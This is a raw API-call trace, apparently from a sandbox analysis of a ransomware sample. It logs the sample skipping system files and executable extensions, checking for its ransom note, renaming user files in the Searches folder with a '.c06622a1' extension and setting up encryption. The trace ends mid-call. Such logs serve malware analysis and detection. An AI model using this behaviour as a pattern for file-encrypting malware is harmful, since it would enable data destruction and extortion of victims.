[0156.140] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0156.140] _wcsicmp (_Str1="Everywhere.search-ms", _Str2="README.c06622a1.TXT") returned -13 [0156.140] wcsstr (_Str="Everywhere.search-ms", _SubStr="README") returned 0x0 [0156.140] _wcsicmp (_Str1="autorun.inf", _Str2="Everywhere.search-ms") returned -4 [0156.140] wcslen (_String="autorun.inf") returned 0xb [0156.140] _wcsicmp (_Str1="boot.ini", _Str2="Everywhere.search-ms") returned -3 [0156.140] wcslen (_String="boot.ini") returned 0x8 [0156.140] _wcsicmp (_Str1="bootfont.bin", _Str2="Everywhere.search-ms") returned -3 [0156.140] wcslen (_String="bootfont.bin") returned 0xc [0156.140] _wcsicmp (_Str1="bootsect.bak", _Str2="Everywhere.search-ms") returned -3 [0156.140] wcslen (_String="bootsect.bak") returned 0xc [0156.140] _wcsicmp (_Str1="desktop.ini", _Str2="Everywhere.search-ms") returned -1 [0156.140] wcslen (_String="desktop.ini") returned 0xb [0156.140] _wcsicmp (_Str1="iconcache.db", _Str2="Everywhere.search-ms") returned 4 [0156.140] wcslen (_String="iconcache.db") returned 0xc [0156.140] _wcsicmp (_Str1="ntldr", _Str2="Everywhere.search-ms") returned 9 [0156.140] wcslen (_String="ntldr") returned 0x5 [0156.140] _wcsicmp (_Str1="ntuser.dat", _Str2="Everywhere.search-ms") returned 9 [0156.140] wcslen (_String="ntuser.dat") returned 0xa [0156.140] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Everywhere.search-ms") returned 9 [0156.140] wcslen (_String="ntuser.dat.log") returned 0xe [0156.140] _wcsicmp (_Str1="ntuser.ini", _Str2="Everywhere.search-ms") returned 9 [0156.140] wcslen (_String="ntuser.ini") returned 0xa [0156.140] _wcsicmp (_Str1="thumbs.db", _Str2="Everywhere.search-ms") returned 15 [0156.141] wcslen (_String="thumbs.db") returned 0x9 [0156.141] _wcsicmp (_Str1="386", _Str2="search-ms") returned -64 [0156.141] wcslen (_String="386") returned 0x3 [0156.141] _wcsicmp (_Str1="adv", _Str2="search-ms") returned -18 [0156.141] wcslen (_String="adv") returned 0x3 [0156.141] _wcsicmp (_Str1="ani", _Str2="search-ms") returned -18 [0156.141] wcslen (_String="ani") returned 0x3 [0156.141] _wcsicmp (_Str1="bat", _Str2="search-ms") returned -17 [0156.141] wcslen (_String="bat") returned 0x3 [0156.141] _wcsicmp (_Str1="bin", _Str2="search-ms") returned -17 [0156.141] wcslen (_String="bin") returned 0x3 [0156.141] _wcsicmp (_Str1="cab", _Str2="search-ms") returned -16 [0156.141] wcslen (_String="cab") returned 0x3 [0156.141] _wcsicmp (_Str1="cmd", _Str2="search-ms") returned -16 [0156.141] wcslen (_String="cmd") returned 0x3 [0156.141] _wcsicmp (_Str1="com", _Str2="search-ms") returned -16 [0156.141] wcslen (_String="com") returned 0x3 [0156.141] _wcsicmp (_Str1="cpl", _Str2="search-ms") returned -16 [0156.141] wcslen (_String="cpl") returned 0x3 [0156.141] _wcsicmp (_Str1="cur", _Str2="search-ms") returned -16 [0156.141] wcslen (_String="cur") returned 0x3 [0156.141] _wcsicmp (_Str1="deskthemepack", _Str2="search-ms") returned -15 [0156.141] wcslen (_String="deskthemepack") returned 0xd [0156.141] _wcsicmp (_Str1="diagcab", _Str2="search-ms") returned -15 [0156.141] wcslen (_String="diagcab") returned 0x7 [0156.141] _wcsicmp (_Str1="diagcfg", _Str2="search-ms") returned -15 [0156.141] wcslen (_String="diagcfg") returned 0x7 [0156.141] _wcsicmp (_Str1="diagpkg", _Str2="search-ms") returned -15 [0156.141] wcslen (_String="diagpkg") returned 0x7 [0156.141] _wcsicmp (_Str1="dll", _Str2="search-ms") returned -15 [0156.141] wcslen (_String="dll") returned 0x3 [0156.141] _wcsicmp (_Str1="drv", _Str2="search-ms") returned -15 [0156.141] wcslen (_String="drv") returned 0x3 [0156.141] _wcsicmp (_Str1="exe", _Str2="search-ms") returned -14 [0156.141] wcslen (_String="exe") returned 0x3 [0156.141] _wcsicmp (_Str1="hlp", _Str2="search-ms") returned -11 [0156.141] wcslen (_String="hlp") returned 0x3 [0156.142] _wcsicmp (_Str1="icl", _Str2="search-ms") returned -10 [0156.142] wcslen (_String="icl") returned 0x3 [0156.142] _wcsicmp (_Str1="icns", _Str2="search-ms") returned -10 [0156.142] wcslen (_String="icns") returned 0x4 [0156.142] _wcsicmp (_Str1="ico", _Str2="search-ms") returned -10 [0156.142] wcslen (_String="ico") returned 0x3 [0156.142] _wcsicmp (_Str1="ics", _Str2="search-ms") returned -10 [0156.142] wcslen (_String="ics") returned 0x3 [0156.142] _wcsicmp (_Str1="idx", _Str2="search-ms") returned -10 [0156.142] wcslen (_String="idx") returned 0x3 [0156.142] _wcsicmp (_Str1="ldf", _Str2="search-ms") returned -7 [0156.142] wcslen (_String="ldf") returned 0x3 [0156.142] _wcsicmp (_Str1="lnk", _Str2="search-ms") returned -7 [0156.142] wcslen (_String="lnk") returned 0x3 [0156.142] _wcsicmp (_Str1="mod", _Str2="search-ms") returned -6 [0156.142] wcslen (_String="mod") returned 0x3 [0156.142] _wcsicmp (_Str1="mpa", _Str2="search-ms") returned -6 [0156.142] wcslen (_String="mpa") returned 0x3 [0156.142] _wcsicmp (_Str1="msc", _Str2="search-ms") returned -6 [0156.142] wcslen (_String="msc") returned 0x3 [0156.142] _wcsicmp (_Str1="msp", _Str2="search-ms") returned -6 [0156.142] wcslen (_String="msp") returned 0x3 [0156.142] _wcsicmp (_Str1="msstyles", _Str2="search-ms") returned -6 [0156.142] wcslen (_String="msstyles") returned 0x8 [0156.142] _wcsicmp (_Str1="msu", _Str2="search-ms") returned -6 [0156.142] wcslen (_String="msu") returned 0x3 [0156.142] _wcsicmp (_Str1="nls", _Str2="search-ms") returned -5 [0156.142] wcslen (_String="nls") returned 0x3 [0156.142] _wcsicmp (_Str1="nomedia", _Str2="search-ms") returned -5 [0156.142] wcslen (_String="nomedia") returned 0x7 [0156.142] _wcsicmp (_Str1="ocx", _Str2="search-ms") returned -4 [0156.142] wcslen (_String="ocx") returned 0x3 [0156.142] _wcsicmp (_Str1="prf", _Str2="search-ms") returned -3 [0156.142] wcslen (_String="prf") returned 0x3 [0156.142] _wcsicmp (_Str1="ps1", _Str2="search-ms") returned -3 [0156.142] wcslen (_String="ps1") returned 0x3 [0156.142] _wcsicmp (_Str1="rom", _Str2="search-ms") returned -1 [0156.142] wcslen (_String="rom") returned 0x3 [0156.142] _wcsicmp (_Str1="rtp", _Str2="search-ms") returned -1 [0156.143] wcslen (_String="rtp") returned 0x3 [0156.143] _wcsicmp (_Str1="scr", _Str2="search-ms") returned -2 [0156.143] wcslen (_String="scr") returned 0x3 [0156.143] _wcsicmp (_Str1="shs", _Str2="search-ms") returned 3 [0156.143] wcslen (_String="shs") returned 0x3 [0156.143] _wcsicmp (_Str1="spl", _Str2="search-ms") returned 11 [0156.143] wcslen (_String="spl") returned 0x3 [0156.143] _wcsicmp (_Str1="sys", _Str2="search-ms") returned 20 [0156.143] wcslen (_String="sys") returned 0x3 [0156.143] _wcsicmp (_Str1="theme", _Str2="search-ms") returned 1 [0156.143] wcslen (_String="theme") returned 0x5 [0156.143] _wcsicmp (_Str1="themepack", _Str2="search-ms") returned 1 [0156.143] wcslen (_String="themepack") returned 0x9 [0156.143] _wcsicmp (_Str1="wpx", _Str2="search-ms") returned 4 [0156.143] wcslen (_String="wpx") returned 0x3 [0156.143] _wcsicmp (_Str1="lock", _Str2="search-ms") returned -7 [0156.143] wcslen (_String="lock") returned 0x4 [0156.143] _wcsicmp (_Str1="key", _Str2="search-ms") returned -8 [0156.143] wcslen (_String="key") returned 0x3 [0156.143] _wcsicmp (_Str1="hta", _Str2="search-ms") returned -11 [0156.143] wcslen (_String="hta") returned 0x3 [0156.143] _wcsicmp (_Str1="msi", _Str2="search-ms") returned -6 [0156.143] wcslen (_String="msi") returned 0x3 [0156.143] _wcsicmp (_Str1="pdb", _Str2="search-ms") returned -3 [0156.143] wcslen (_String="pdb") returned 0x3 [0156.143] _wcsicmp (_Str1="sql", _Str2="search-ms") returned 12 [0156.143] wcslen (_String="sql") returned 0x3 [0156.143] _wcsicmp (_Str1="sqlite", _Str2="search-ms") returned 12 [0156.143] wcslen (_String="sqlite") returned 0x6 [0156.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 0x11 [0156.143] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0156.143] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0156.143] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 0x2a [0156.143] wcscpy (in: _Dest=0x44d00ce, _Source="Everywhere.search-ms" | out: _Dest="Everywhere.search-ms") returned="Everywhere.search-ms" [0156.143] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0156.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0156.144] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.144] ReadFile (in: hFile=0x67c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0156.145] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xd70d7633 [0156.145] RtlComputeCrc32 (PartialCrc=0x7633, Buffer=0x3feb74, Length=0x80) returned 0x128debe7 [0156.145] RtlComputeCrc32 (PartialCrc=0xebe7, Buffer=0x3feb74, Length=0x80) returned 0x4a1cd176 [0156.145] RtlComputeCrc32 (PartialCrc=0xd176, Buffer=0x3feb74, Length=0x80) returned 0x77fe9b0e [0156.145] RtlComputeCrc32 (PartialCrc=0x9b0e, Buffer=0x3feb74, Length=0x80) returned 0xed7e55b9 [0156.145] CloseHandle (hObject=0x67c) returned 1 [0156.145] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0156.145] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0156.145] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 0x3f [0156.145] wcscpy (in: _Dest=0x44e00fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.145] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.c06622a1"), dwFlags=0x8) returned 1 [0156.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0156.148] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.148] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x608216b5 [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ce4fb6b [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd946bd1 [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xff8c5d6 [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x300ff01a [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d3983 [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2af9875c [0156.154] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63759587 [0156.157] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0xc90aa005 [0156.157] RtlComputeCrc32 (PartialCrc=0xa005, Buffer=0x2910094, Length=0x80) returned 0x6b859d04 [0156.157] RtlComputeCrc32 (PartialCrc=0x9d04, Buffer=0x2910094, Length=0x80) returned 0x113a357a [0156.157] RtlComputeCrc32 (PartialCrc=0x357a, Buffer=0x2910094, Length=0x80) returned 0x3ab41802 [0156.157] RtlComputeCrc32 (PartialCrc=0x1802, Buffer=0x2910094, Length=0x80) returned 0x2de7b89d [0156.157] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.157] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.157] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.157] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0156.157] _wcsicmp (_Str1="Indexed Locations.search-ms", _Str2="README.c06622a1.TXT") returned -9 [0156.158] wcsstr (_Str="Indexed Locations.search-ms", _SubStr="README") returned 0x0 [0156.158] _wcsicmp (_Str1="autorun.inf", _Str2="Indexed Locations.search-ms") returned -8 [0156.158] wcslen (_String="autorun.inf") returned 0xb [0156.158] _wcsicmp (_Str1="boot.ini", _Str2="Indexed Locations.search-ms") returned -7 [0156.158] wcslen (_String="boot.ini") returned 0x8 [0156.158] _wcsicmp (_Str1="bootfont.bin", _Str2="Indexed Locations.search-ms") returned -7 [0156.158] wcslen (_String="bootfont.bin") returned 0xc [0156.158] _wcsicmp (_Str1="bootsect.bak", _Str2="Indexed Locations.search-ms") returned -7 [0156.158] wcslen (_String="bootsect.bak") returned 0xc [0156.158] _wcsicmp (_Str1="desktop.ini", _Str2="Indexed Locations.search-ms") returned -5 [0156.158] wcslen (_String="desktop.ini") returned 0xb [0156.158] _wcsicmp (_Str1="iconcache.db", _Str2="Indexed Locations.search-ms") returned -11 [0156.158] wcslen (_String="iconcache.db") returned 0xc [0156.158] _wcsicmp (_Str1="ntldr", _Str2="Indexed Locations.search-ms") returned 5 [0156.158] wcslen (_String="ntldr") returned 0x5 [0156.158] _wcsicmp (_Str1="ntuser.dat", _Str2="Indexed Locations.search-ms") returned 5 [0156.158] wcslen (_String="ntuser.dat") returned 0xa [0156.158] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Indexed Locations.search-ms") returned 5 [0156.158] wcslen (_String="ntuser.dat.log") returned 0xe [0156.158] _wcsicmp (_Str1="ntuser.ini", _Str2="Indexed Locations.search-ms") returned 5 [0156.158] wcslen (_String="ntuser.ini") returned 0xa [0156.158] _wcsicmp (_Str1="thumbs.db", _Str2="Indexed Locations.search-ms") returned 11 [0156.158] wcslen (_String="thumbs.db") returned 0x9 [0156.158] _wcsicmp (_Str1="386", _Str2="search-ms") returned -64 [0156.158] wcslen (_String="386") returned 0x3 [0156.158] _wcsicmp (_Str1="adv", _Str2="search-ms") returned -18 [0156.158] wcslen (_String="adv") returned 0x3 [0156.158] _wcsicmp (_Str1="ani", _Str2="search-ms") returned -18 [0156.158] wcslen (_String="ani") returned 0x3 [0156.158] _wcsicmp (_Str1="bat", _Str2="search-ms") returned -17 [0156.158] wcslen (_String="bat") returned 0x3 [0156.158] _wcsicmp (_Str1="bin", _Str2="search-ms") returned -17 [0156.158] wcslen (_String="bin") returned 0x3 [0156.158] _wcsicmp (_Str1="cab", _Str2="search-ms") returned -16 [0156.158] wcslen (_String="cab") returned 0x3 [0156.158] _wcsicmp (_Str1="cmd", _Str2="search-ms") returned -16 [0156.158] wcslen (_String="cmd") returned 0x3 [0156.159] _wcsicmp (_Str1="com", _Str2="search-ms") returned -16 [0156.159] wcslen (_String="com") returned 0x3 [0156.159] _wcsicmp (_Str1="cpl", _Str2="search-ms") returned -16 [0156.159] wcslen (_String="cpl") returned 0x3 [0156.159] _wcsicmp (_Str1="cur", _Str2="search-ms") returned -16 [0156.159] wcslen (_String="cur") returned 0x3 [0156.159] _wcsicmp (_Str1="deskthemepack", _Str2="search-ms") returned -15 [0156.159] wcslen (_String="deskthemepack") returned 0xd [0156.159] _wcsicmp (_Str1="diagcab", _Str2="search-ms") returned -15 [0156.159] wcslen (_String="diagcab") returned 0x7 [0156.159] _wcsicmp (_Str1="diagcfg", _Str2="search-ms") returned -15 [0156.159] wcslen (_String="diagcfg") returned 0x7 [0156.159] _wcsicmp (_Str1="diagpkg", _Str2="search-ms") returned -15 [0156.159] wcslen (_String="diagpkg") returned 0x7 [0156.159] _wcsicmp (_Str1="dll", _Str2="search-ms") returned -15 [0156.159] wcslen (_String="dll") returned 0x3 [0156.159] _wcsicmp (_Str1="drv", _Str2="search-ms") returned -15 [0156.159] wcslen (_String="drv") returned 0x3 [0156.159] _wcsicmp (_Str1="exe", _Str2="search-ms") returned -14 [0156.159] wcslen (_String="exe") returned 0x3 [0156.159] _wcsicmp (_Str1="hlp", _Str2="search-ms") returned -11 [0156.159] wcslen (_String="hlp") returned 0x3 [0156.159] _wcsicmp (_Str1="icl", _Str2="search-ms") returned -10 [0156.159] wcslen (_String="icl") returned 0x3 [0156.159] _wcsicmp (_Str1="icns", _Str2="search-ms") returned -10 [0156.159] wcslen (_String="icns") returned 0x4 [0156.159] _wcsicmp (_Str1="ico", _Str2="search-ms") returned -10 [0156.159] wcslen (_String="ico") returned 0x3 [0156.159] _wcsicmp (_Str1="ics", _Str2="search-ms") returned -10 [0156.159] wcslen (_String="ics") returned 0x3 [0156.159] _wcsicmp (_Str1="idx", _Str2="search-ms") returned -10 [0156.159] wcslen (_String="idx") returned 0x3 [0156.159] _wcsicmp (_Str1="ldf", _Str2="search-ms") returned -7 [0156.159] wcslen (_String="ldf") returned 0x3 [0156.159] _wcsicmp (_Str1="lnk", _Str2="search-ms") returned -7 [0156.159] wcslen (_String="lnk") returned 0x3 [0156.159] _wcsicmp (_Str1="mod", _Str2="search-ms") returned -6 [0156.160] wcslen (_String="mod") returned 0x3 [0156.160] _wcsicmp (_Str1="mpa", _Str2="search-ms") returned -6 [0156.160] wcslen (_String="mpa") returned 0x3 [0156.160] _wcsicmp (_Str1="msc", _Str2="search-ms") returned -6 [0156.160] wcslen (_String="msc") returned 0x3 [0156.160] _wcsicmp (_Str1="msp", _Str2="search-ms") returned -6 [0156.160] wcslen (_String="msp") returned 0x3 [0156.160] _wcsicmp (_Str1="msstyles", _Str2="search-ms") returned -6 [0156.160] wcslen (_String="msstyles") returned 0x8 [0156.160] _wcsicmp (_Str1="msu", _Str2="search-ms") returned -6 [0156.160] wcslen (_String="msu") returned 0x3 [0156.160] _wcsicmp (_Str1="nls", _Str2="search-ms") returned -5 [0156.160] wcslen (_String="nls") returned 0x3 [0156.160] _wcsicmp (_Str1="nomedia", _Str2="search-ms") returned -5 [0156.160] wcslen (_String="nomedia") returned 0x7 [0156.160] _wcsicmp (_Str1="ocx", _Str2="search-ms") returned -4 [0156.160] wcslen (_String="ocx") returned 0x3 [0156.160] _wcsicmp (_Str1="prf", _Str2="search-ms") returned -3 [0156.160] wcslen (_String="prf") returned 0x3 [0156.160] _wcsicmp (_Str1="ps1", _Str2="search-ms") returned -3 [0156.160] wcslen (_String="ps1") returned 0x3 [0156.160] _wcsicmp (_Str1="rom", _Str2="search-ms") returned -1 [0156.160] wcslen (_String="rom") returned 0x3 [0156.160] _wcsicmp (_Str1="rtp", _Str2="search-ms") returned -1 [0156.160] wcslen (_String="rtp") returned 0x3 [0156.160] _wcsicmp (_Str1="scr", _Str2="search-ms") returned -2 [0156.160] wcslen (_String="scr") returned 0x3 [0156.160] _wcsicmp (_Str1="shs", _Str2="search-ms") returned 3 [0156.160] wcslen (_String="shs") returned 0x3 [0156.160] _wcsicmp (_Str1="spl", _Str2="search-ms") returned 11 [0156.160] wcslen (_String="spl") returned 0x3 [0156.160] _wcsicmp (_Str1="sys", _Str2="search-ms") returned 20 [0156.160] wcslen (_String="sys") returned 0x3 [0156.160] _wcsicmp (_Str1="theme", _Str2="search-ms") returned 1 [0156.160] wcslen (_String="theme") returned 0x5 [0156.160] _wcsicmp (_Str1="themepack", _Str2="search-ms") returned 1 [0156.160] wcslen (_String="themepack") returned 0x9 [0156.160] _wcsicmp (_Str1="wpx", _Str2="search-ms") returned 4 [0156.161] wcslen (_String="wpx") returned 0x3 [0156.161] _wcsicmp (_Str1="lock", _Str2="search-ms") returned -7 [0156.161] wcslen (_String="lock") returned 0x4 [0156.161] _wcsicmp (_Str1="key", _Str2="search-ms") returned -8 [0156.161] wcslen (_String="key") returned 0x3 [0156.161] _wcsicmp (_Str1="hta", _Str2="search-ms") returned -11 [0156.161] wcslen (_String="hta") returned 0x3 [0156.161] _wcsicmp (_Str1="msi", _Str2="search-ms") returned -6 [0156.161] wcslen (_String="msi") returned 0x3 [0156.161] _wcsicmp (_Str1="pdb", _Str2="search-ms") returned -3 [0156.161] wcslen (_String="pdb") returned 0x3 [0156.161] _wcsicmp (_Str1="sql", _Str2="search-ms") returned 12 [0156.161] wcslen (_String="sql") returned 0x3 [0156.161] _wcsicmp (_Str1="sqlite", _Str2="search-ms") returned 12 [0156.161] wcslen (_String="sqlite") returned 0x6 [0156.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches")) returned 0x11 [0156.161] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0156.161] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0156.161] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 0x2a [0156.161] wcscpy (in: _Dest=0x44d00ce, _Source="Indexed Locations.search-ms" | out: _Dest="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0156.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1 [0156.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0156.162] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.162] ReadFile (in: hFile=0x644, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0156.162] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x87464942 [0156.162] RtlComputeCrc32 (PartialCrc=0x4942, Buffer=0x3feb74, Length=0x80) returned 0xa540aa3d [0156.163] RtlComputeCrc32 (PartialCrc=0xaa3d, Buffer=0x3feb74, Length=0x80) returned 0x9fc4970d [0156.163] RtlComputeCrc32 (PartialCrc=0x970d, Buffer=0x3feb74, Length=0x80) returned 0xe26e4318 [0156.163] RtlComputeCrc32 (PartialCrc=0x4318, Buffer=0x3feb74, Length=0x80) returned 0x7cab2480 [0156.163] CloseHandle (hObject=0x644) returned 1 [0156.163] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0156.163] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0156.163] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 0x46 [0156.163] wcscpy (in: _Dest=0x44e010c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.163] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.c06622a1"), dwFlags=0x8) returned 1 [0156.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0156.165] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.165] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd9823e1 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x42708e67 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6348ad36 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d85f156 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4fcd1591 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfd68f44 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ee24d47 [0156.171] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14ad045b [0156.174] RtlComputeCrc32 (PartialCrc=0xbeef, 